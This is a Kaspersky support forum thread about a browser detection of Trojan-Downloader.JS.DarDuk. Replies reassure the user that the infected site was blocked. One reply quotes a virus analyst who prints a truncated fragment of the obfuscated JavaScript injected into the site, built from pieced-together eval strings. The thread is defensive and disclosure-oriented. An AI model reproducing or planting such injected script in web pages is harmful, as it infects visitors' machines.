pustolovka

KAV and Trojan-Downloader.JS.DarDuk.kt

5 posts in this topic

My KAV 2012 detected Trojan-Downloader.JS.DarDuk.kt when I visited a particular web page. One minute later I googled it again and klicked on it and KAV did not report that it was malicious. Is my computer still infected? How can I be sure that this trojan is not downloaded on my computer. Here is a screenshot of report:

post-315120-1334327688_thumb.png

Share this post


Link to post
Share on other sites

An infected website was detected and blocked.

Your PC was not infected.

Please right click the detected object and delete it from the list,

then reboot and proceed with CCleaner.

Edited by Berny

Share this post


Link to post
Share on other sites
Hello,

 

This is not a false alarm, this site is infected.

 

Here is the malicious code:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';}

n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.

 

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change login/password, because they can be stolen.

Regards

Virus Analyst

Share this post


Link to post
Share on other sites
An infected website was detected and blocked.

Your PC was not infected.

Please right click the detected object and delete it from the list,

then reboot and proceed with CCleaner.

 

Thanks!

Can you please tell me what the quoted post under ( from Caos) means?

Share this post


Link to post
Share on other sites

Caos sent the website to KL virus lab to check. Kaspersky Virus lab responded with what is in the quote. To paraphrase: the site is infected with identification of the code that is malicious. Also KL has instructions for web master and to change your passwords and login credentials. As Berny says, Kaspersky blocked the infected website.

 

Right click that entry in your screenshot and remove or delete then to be safe, scan with Kaspersky and post any detections here on the forum.

Edited by rudger79

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now